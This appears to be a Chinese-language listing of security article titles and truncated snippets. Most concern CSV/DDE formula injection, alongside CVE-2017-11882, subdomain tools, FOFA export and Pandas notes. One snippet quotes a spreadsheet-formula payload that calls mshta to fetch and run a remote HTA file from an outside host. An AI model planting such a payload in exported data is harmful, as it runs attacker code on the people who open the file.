CVE-2017-11882影响范围MicrosoftOffice 2000 MicrosoftOffice 2003 MicrosoftOffice 2007 Service P...
关于微信csv导出漏洞
先看图网传payload:=mshta|'http:\ceye.io1.hta'!A0图片说的用户名改成以上payload,测试了一下是可以改的,但是长度有限制,下图多加了1个字符就是极限了,实战中基...
DDE注入(CSV)漏洞原理及实战案例全汇总
在渗透中遇到导出功能时,会如何进行测试?任意文件下载?或者越权查看?很多人很容易忽略的是DDE注入:导出格式为csv,xls时,或许你可以尝试构造这个漏洞,它不会对网站本身产生危害,但会对终端用户造成...
CSV注入
CSV 介绍CSV 是“Comma-Separated Values”的缩写,是一种常见的数据格式。CSV 文件通常包含一系列以逗号分隔的值,每个值都表示数据的一个字段。这种数据格式常用于将数据从一个...
CSV注入之RCE&社工钓鱼
漏洞介绍CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量,攻击这可以向Excel文件中注入可以输出或以CSV文件读取的恶意攻击载荷,当用户打开Excel文件时,文件会从CSV...
【技巧】如何将一个Twitter账号的关注者导出到Excel / CSV列表中
Twitter是开源情报分析师经常需要分析的网络社交媒体,为了分析相关人员的社交网络,情报分析师往往需要将一群人的Twitter账号的关注列表导入可视化分析工具中进行社交网络分析,才能准确分析清楚相关...
几款好用的子域名收集工具【文末赠书】
前言收集子域名的工具和方式有很多,但是有很多工具并不是很好用,我觉得在爆破子域名的时候有几个参数值是很重要的,一个就是工具收集子域名的途径是否齐全,再一个是是否会显示title信息以及子域名的响应状态...
区区几行Python代码,就能实现全面自动探索性数据分析!
来源丨数据STUDIO探索性数据分析是数据科学模型开发和数据集研究的重要组成部分之一。在拿到一个新数据集时首先就需要花费大量时间进行EDA来研究数据集中内在的信息。自动化的EDA Python包可以用...
FOFA批量查询目标并导出CSV文件
项目地址https://github.com/jax7sec/FOFA_CSV使用说明FOFA批量查询导出CSV文件 请先新建api_key.ini文件并写入api key如:email=xxx&am...
【学习笔记】大数据与机器学习— Pandas
[huayang] 导入方式 import numpy as np import pandas as pd 数据读取 csv文件 import numpy as np import pandas as...
Findomain:使用证书透明度日志查找子域名的工具
####################免责声明:工具本身并无好坏,希望大家以遵守《网络安全法》相关法律为前提来使用该工具,支持研究学习,切勿用于非法犯罪活动,对于恶意使用该工具造成的损失,和本人及开...
【学习笔记】大数据与机器学习— Pandas
[huayang] 导入方式 import numpy as np import pandas as pd 数据读取 csv文件 import numpy as np import pandas as...
7